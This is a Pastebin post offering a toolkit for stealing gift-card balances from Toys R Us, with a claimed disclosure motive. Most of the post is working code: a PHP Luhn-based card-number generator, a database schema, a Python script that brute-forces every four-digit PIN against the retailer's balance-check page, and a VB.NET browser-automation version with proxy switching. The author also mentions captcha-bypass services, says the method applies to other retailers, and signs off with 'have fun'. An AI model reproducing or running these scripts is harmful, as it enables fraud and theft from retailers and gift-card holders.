API tools faq
paste
Guest User

Toys R Us Gift Card Security Breach 2016 [V2]

a guest
Sep 13th, 2016
404
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.93 KB | None | 0 0
raw download clone embed print report
  1. Well my 1337 hacker community hackforums.net wouldn't let me post this :'(.
  2.  
  3. Posting this cause' Toys R Us needs to fix their security. I can't contact them directly, so I'll let you guys handle that.
  4.  
  5. Security on the Internet needs to be taken seriously now-a-days. I'd recommend corporations having a system for these kind of things like Google and Facebook have. But first start off with a captcha. I'm not talking about the text captcha Stables and Home Depot. I'm talking about those nice captchas that this site has for example. Although, that doesn't even work as there are services out there that offer a captcha by-pass and when you're paying $2 for 1000 completed captchas, well hitting a $100 gift card does make up for that.
  6.  
  7. Same method applies to Victoria Secret and Nordstrom too ;).
  8.  
  9. ----------------------------------------------------------------------------------------------
  10.  
  11. Toys R Us gift cards go by the luth algo.
  12.  
  13. Gift Card #: 6276687308393584
  14. Pin #: 0236
  15.  
  16. If you check gift card # with luth validator: validcreditcardnumber.com
  17.  
  18. It comes back with a green check.
  19.  
  20. Now. We delete one number "4" (627668730839358). Check with: planetcalc.com/2464/
  21.  
  22. They say the next digit is "4". Now we can print out some numbers.
  23.  
  24. <?php
  25.  
  26.  
  27. function Luhn($number, $iterations)
  28. {
  29. while ($iterations-- >= 1)
  30. {
  31. $stack = 0;
  32. $number = str_split(strrev($number), 1);
  33.  
  34. foreach ($number as $key => $value)
  35. {
  36. if ($key % 2 == 0)
  37. {
  38. $value = array_sum(str_split($value * 2, 1));
  39. }
  40.  
  41. $stack += $value;
  42. }
  43.  
  44. $stack %= 10;
  45.  
  46. if ($stack != 0)
  47. {
  48. $stack -= 10;
  49. }
  50.  
  51. $number = implode('', array_reverse($number)) . abs($stack);
  52. }
  53.  
  54. return $number;
  55. }
  56.  
  57. $orgin = "627668730839";
  58. $last = "358";
  59. ?>
  60. INSERT INTO `cards` (`card_number`, `pin_number`, `success`, `proccessing`, `current_pin`, `balance`) VALUES
  61. <?php
  62. for ($x = 0; $x <= 40; $x++) {
  63.  
  64. echo "('" . Luhn($orgin . $last, 1) . "', '0', 0, 0, '0', '')," . "</br>";
  65. $last -= 1;
  66. }
  67.  
  68. ?>
  69.  
  70. Now we have numbers and a database.
  71.  
  72. CREATE TABLE `cards` (
  73. `id` int(11) NOT NULL,
  74. `card_number` varchar(255) NOT NULL,
  75. `pin_number` varchar(11) NOT NULL,
  76. `success` int(11) NOT NULL,
  77. `proccessing` int(11) NOT NULL,
  78. `current_pin` varchar(11) NOT NULL,
  79. `balance` varchar(255) NOT NULL
  80. ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
  81.  
  82. And now we have a Pyton script that pulls from the DB and begins checking.
  83.  
  84. from bs4 import BeautifulSoup
  85. import re
  86. import urllib.request, urllib, json, time, atexit, sys
  87. import http
  88. import io
  89. import csv
  90. import os
  91. from random import randint
  92.  
  93. def process_card(card, pin):
  94. headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", 'Referer': 'https://www.toysrus.com/checkout/checkAccountBalance.jsp', "Content-Type":'application/x-www-form-urlencoded'}
  95.  
  96. cj = http.cookiejar.CookieJar()
  97. req = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
  98. req.addheaders = list(headers.items())
  99.  
  100. req.open("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
  101.  
  102. # The data should be URL-encoded and then encoded using UTF-8 for best compatilibity
  103. data = urllib.parse.urlencode({"step": "giftcardBalance", "accountNumber": str(card), "pin": str(pin)}).encode("UTF-8")
  104. res = req.open("https://www.toysrus.com/coreg/index.jsp", data)
  105.  
  106. parse_page = BeautifulSoup(res.read(), "lxml")
  107. grab_result = str(parse_page.findAll("div", { "class" : "instructions" }))
  108.  
  109. if "Error processing, please try again later" in grab_result:
  110. amount = "fail"
  111. elif "This reflects your" in grab_result:
  112. amount = re.findall(r'([£$€])(\d+(?:\.\d{2})?)', grab_result)
  113. else:
  114. print("Error Handle Alert")
  115. f = open("error_" + str(int(time.time())) + ".html", "wb")
  116. content = res.read()
  117. f.write(content)
  118. f.close()
  119. exit_handler()
  120.  
  121. return amount
  122.  
  123. card_number = None
  124. pin_number = None
  125.  
  126. def main():
  127. global card_number
  128. global pin_number
  129.  
  130. card_number = urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?grab=yea")).read()
  131.  
  132. if "|" in str(card_number):
  133. card_number_split = str(card_number.strip().decode("utf-8")).split("|")
  134. card_number = str(card_number_split[0])
  135. pin_number = str(card_number_split[1])
  136. else:
  137. card_number = str(card_number.strip().decode("utf-8"))
  138.  
  139. if card_number is "":
  140. exit_handler()
  141.  
  142. request_processing = urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" + card_number)).read()
  143.  
  144. if request_processing is None:
  145. exit_handler()
  146. else:
  147. print("[STARTING]")
  148. if pin_number is None:
  149. range_set = 0
  150. else:
  151. range_set = int(pin_number)
  152.  
  153. for i in range(range_set, 9999):
  154. pin = '{0:04}'.format(i)
  155. process = process_card(card_number, pin)
  156.  
  157. if "fail" not in process:
  158. urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&success=yea&card=" + card_number + "&pin=" + pin + "&balance=" + process[0][1]))
  159. print("Success:", process[0][1])
  160. exit()
  161. else:
  162. print("Failed:", card_number, pin)
  163. urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" + card_number + "&pin=" + pin))
  164.  
  165. def exit_handler():
  166. global card_number
  167. urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=na&card=" + card_number))
  168. try:
  169. sys.exit(0)
  170. except SystemExit:
  171. os._exit(0)
  172.  
  173. if __name__=='__main__':
  174. try:
  175. main()
  176. except KeyboardInterrupt:
  177. exit_handler()
  178. except Exception as e:
  179. exit_handler()
  180.  
  181. atexit.register(exit_handler)
  182.  
  183. All of a sudden we have the other PHP file.
  184.  
  185. <?php
  186. // organizer.php
  187.  
  188. $servername = "localhost";
  189. $username = "DB USERNSME";
  190. $password = "DB PASSWORD";
  191. $dbname = "DB NAME";
  192.  
  193. $grab = $_GET['grab'];
  194. $update = $_GET['update'];
  195. $pin = $_GET['pin'];
  196. $card = $_GET['card'];
  197. $success = $_GET['success'];
  198. $proccessing = $_GET['proccessing'];
  199. $balance = $_GET['balance'];
  200.  
  201. if(isset($grab) == "yea") {
  202. // Create connection
  203. $conn = new mysqli($servername, $username, $password, $dbname);
  204. // Check connection
  205. if ($conn->connect_error) {
  206. die("Connection failed: " . $conn->connect_error);
  207. }
  208.  
  209. $sql = "SELECT * FROM cards ORDER BY RAND()";
  210. $result = $conn->query($sql);
  211.  
  212. if ($result->num_rows > 0) {
  213. while($row = $result->fetch_assoc()) {
  214. if($row['proccessing'] == 0 && $row['success'] == 0) {
  215. if($row['current_pin'] == 0) {
  216. echo $row['card_number'];
  217. break;
  218. } else {
  219. echo $row['card_number'] . "|" . $row['current_pin'];
  220. break;
  221. }
  222. }
  223. }
  224. } else {
  225. echo "Fail";
  226. }
  227. $conn->close();
  228. }
  229.  
  230. if(isset($update) == "yea" && isset($success) == "yea" && isset($card) && isset($pin) && isset($balance)) {
  231. // Create connection
  232. $conn = new mysqli($servername, $username, $password, $dbname);
  233. // Check connection
  234. if ($conn->connect_error) {
  235. die("Connection failed: " . $conn->connect_error);
  236. }
  237.  
  238. $sql = "UPDATE cards SET pin_number='" . $pin . "', balance='" . $balance . "', success='1' WHERE card_number='" . $card . "';";
  239. $result = $conn->query($sql);
  240.  
  241. if (!$result) {
  242. echo "Fail";
  243. }
  244. $conn->close();
  245. }
  246.  
  247. if(isset($update) == "yea" && isset($proccessing) == "yea" && isset($card)) {
  248. // Create connection
  249. $conn = new mysqli($servername, $username, $password, $dbname);
  250. // Check connection
  251. if ($conn->connect_error) {
  252. die("Connection failed: " . $conn->connect_error);
  253. }
  254.  
  255. $sql = "UPDATE cards SET proccessing='1' WHERE card_number='" . $card . "';";
  256. $result = $conn->query($sql);
  257.  
  258. if (!$result) {
  259. echo "Fail";
  260. }
  261. $conn->close();
  262. }
  263.  
  264. if(isset($update) == "yea" && isset($proccessing) && $proccessing == "na" && isset($card)) {
  265. // Create connection
  266. $conn = new mysqli($servername, $username, $password, $dbname);
  267. // Check connection
  268. if ($conn->connect_error) {
  269. die("Connection failed: " . $conn->connect_error);
  270. }
  271.  
  272. $sql = "UPDATE cards SET proccessing='0' WHERE card_number='" . $card . "';";
  273. $result = $conn->query($sql);
  274.  
  275. if (!$result) {
  276. echo "Fail";
  277. }
  278. $conn->close();
  279. }
  280.  
  281. if(isset($update) == "yea" && isset($proccessing) == "yea" && isset($card) && isset($pin)) {
  282. // Create connection
  283. $conn = new mysqli($servername, $username, $password, $dbname);
  284. // Check connection
  285. if ($conn->connect_error) {
  286. die("Connection failed: " . $conn->connect_error);
  287. }
  288.  
  289. $sql = "UPDATE cards SET current_pin='" . $pin . "' WHERE card_number='" . $card . "';";
  290. $result = $conn->query($sql);
  291.  
  292. if (!$result) {
  293. echo "Fail";
  294. }
  295. $conn->close();
  296. }
  297. ?>
  298.  
  299. You can figure out how to piece it together. But once up n' running, have fun.
  300.  
  301. VB.NET version:
  302.  
  303. Imports System.IO
  304. Imports System.Net
  305.  
  306. Public Class Form1
  307. Dim Begin As Boolean = False
  308. Dim pin As String
  309. Dim card As String
  310. Private Function RemoveInvalidFileNameChars(UserInput As String) As String
  311. For Each invalidChar In IO.Path.GetInvalidFileNameChars
  312. UserInput = UserInput.Replace(invalidChar, "")
  313. Next
  314. Return UserInput
  315. End Function
  316. Private Function GetBetween(ByVal sSearch As String, ByVal sStart As String, ByVal sStop As String, Optional ByVal lSearch As Integer = 1) As String
  317. Dim lTemp As Long
  318.  
  319. lSearch = InStr(lSearch, sSearch, sStart)
  320. If lSearch > 0 Then
  321. lSearch = lSearch + Len(sStart)
  322. lTemp = InStr(lSearch, sSearch, sStop)
  323. If lTemp > lSearch Then Return Trim(Mid$(sSearch, lSearch, lTemp - lSearch))
  324. End If
  325. Return vbNullString
  326. End Function
  327. Private Sub Button2_Click(sender As Object, e As EventArgs)
  328.  
  329. NumericUpDown2.Value = TextBox1.Text
  330. WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
  331. Begin = True
  332. End Sub
  333. Public Function Proccess() As String
  334. Begin = False
  335.  
  336. If WebBrowser1.DocumentText.Contains("Error processing") Then
  337. Dim webClient As New System.Net.WebClient
  338. webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" & TextBox3.Text & "&pin=" & TextBox1.Text)
  339. NumericUpDown2.Value += 1
  340. ElseIf WebBrowser1.DocumentText.Contains("This reflects your Toys R Us Gift Card Balance") Then
  341. Dim webClient As New System.Net.WebClient
  342.  
  343. Dim balance As String = GetBetween(WebBrowser1.DocumentText, "<div class=""instructions"">", "</div>")
  344. Dim balance_ As String() = RemoveInvalidFileNameChars(balance).Split("$")
  345. webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&success=yea&card=" & TextBox3.Text & "&pin=" & TextBox1.Text & "&balance=" & balance_(1))
  346. 'MessageBox.Show("Success! PIN: " & TextBox1.Text)
  347.  
  348. 'WebBrowser1.Navigate("javascript:document.newcard.submit()")
  349.  
  350. Me.Close()
  351.  
  352. ElseIf WebBrowser1.Document.GetElementById("pin") Is Nothing Then
  353. Timer1.Enabled = True
  354. Timer1.Start()
  355. End If
  356. If Not WebBrowser1.Document.GetElementById("accountNumber") Is Nothing Then
  357. WebBrowser1.Document.GetElementById("accountNumber").SetAttribute("value", TextBox3.Text)
  358. WebBrowser1.Document.GetElementById("pin").SetAttribute("value", TextBox1.Text.ToString)
  359. WebBrowser1.Document.GetElementById("checkAccountBtn").Focus()
  360. WebBrowser1.Document.GetElementById("checkAccountBtn").InvokeMember("click")
  361. End If
  362. End Function
  363. Private Sub WebBrowser1_DocumentCompleted(sender As Object, e As WebBrowserDocumentCompletedEventArgs) Handles WebBrowser1.DocumentCompleted
  364. Proccess()
  365. End Sub
  366. Private Sub NumericUpDown2_ValueChanged(sender As Object, e As EventArgs) Handles NumericUpDown2.ValueChanged
  367. If NumericUpDown2.Value < 10 Then
  368. TextBox1.Text = "000" & NumericUpDown2.Value
  369. ElseIf NumericUpDown2.Value < 100 Then
  370. TextBox1.Text = "00" & NumericUpDown2.Value
  371. ElseIf NumericUpDown2.Value < 1000 Then
  372. TextBox1.Text = "0" & NumericUpDown2.Value
  373. ElseIf NumericUpDown2.Value < 1000 Then
  374. TextBox1.Text = NumericUpDown2.Value
  375. Else
  376. TextBox1.Text = NumericUpDown2.Value
  377. End If
  378. End Sub
  379.  
  380. Private Sub Form1_FormClosing(sender As Object, e As FormClosingEventArgs) Handles Me.FormClosing
  381. Dim webClient As New System.Net.WebClient
  382. webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=na&card=" & card)
  383. End Sub
  384.  
  385. Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
  386. If TextBox1.Text = TextBox2.Text Then
  387. Me.Close()
  388. End If
  389. ProgressBar1.Value += 1
  390. If ProgressBar1.Value = ProgressBar1.Maximum Then
  391. WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
  392. Timer1.Enabled = False
  393. Timer1.Stop()
  394. ProgressBar1.Value = 0
  395. End If
  396. End Sub
  397.  
  398. ' The structure we use for the information
  399. ' to be interpreted correctly by API.
  400. Public Structure Struct_INTERNET_PROXY_INFO
  401. Public dwAccessType As Integer
  402. Public proxy As IntPtr
  403. Public proxyBypass As IntPtr
  404. End Structure
  405.  
  406. ' The Windows API function that allows us to manipulate
  407. ' IE settings programmatically.
  408. Private Declare Auto Function InternetSetOption Lib "wininet.dll" _
  409. (ByVal hInternet As IntPtr, ByVal dwOption As Integer, ByVal lpBuffer As IntPtr,
  410. ByVal lpdwBufferLength As Integer) As Boolean
  411.  
  412. ' The function we will be using to set the proxy settings.
  413. Private Sub RefreshIESettings(ByVal strProxy As String)
  414. Const INTERNET_OPTION_PROXY As Integer = 38
  415. Const INTERNET_OPEN_TYPE_PROXY As Integer = 3
  416. Dim struct_IPI As Struct_INTERNET_PROXY_INFO
  417.  
  418. ' Filling in structure
  419. struct_IPI.dwAccessType = INTERNET_OPEN_TYPE_PROXY
  420. struct_IPI.proxy = System.Runtime.InteropServices.Marshal.StringToHGlobalAnsi(strProxy)
  421. struct_IPI.proxyBypass = System.Runtime.InteropServices.Marshal.StringToHGlobalAnsi("local")
  422.  
  423. ' Allocating memory
  424. Dim intptrStruct As IntPtr = System.Runtime.InteropServices.Marshal.AllocCoTaskMem(System.Runtime.InteropServices.Marshal.SizeOf(struct_IPI))
  425.  
  426. ' Converting structure to IntPtr
  427. System.Runtime.InteropServices.Marshal.StructureToPtr(struct_IPI, intptrStruct, True)
  428. Dim iReturn As Boolean = InternetSetOption(IntPtr.Zero, INTERNET_OPTION_PROXY, intptrStruct, System.Runtime.InteropServices.Marshal.SizeOf(struct_IPI))
  429. End Sub
  430.  
  431. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load
  432. Dim webClient As New System.Net.WebClient
  433. Dim result As String = webClient.DownloadString("http://127.0.0.1/gift/organizer.php?grab=yea")
  434. If result.Contains("|") Then
  435. Dim split As String() = result.Split("|")
  436. card = split(0)
  437. pin = split(1)
  438. NumericUpDown2.Value = pin
  439. TextBox1.Text = pin
  440. TextBox3.Text = card
  441. Else
  442. card = result
  443. TextBox3.Text = result
  444. NumericUpDown2.Value = TextBox1.Text
  445. End If
  446.  
  447. webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" & card)
  448. WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
  449.  
  450. Begin = True
  451. End Sub
  452. End Class
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!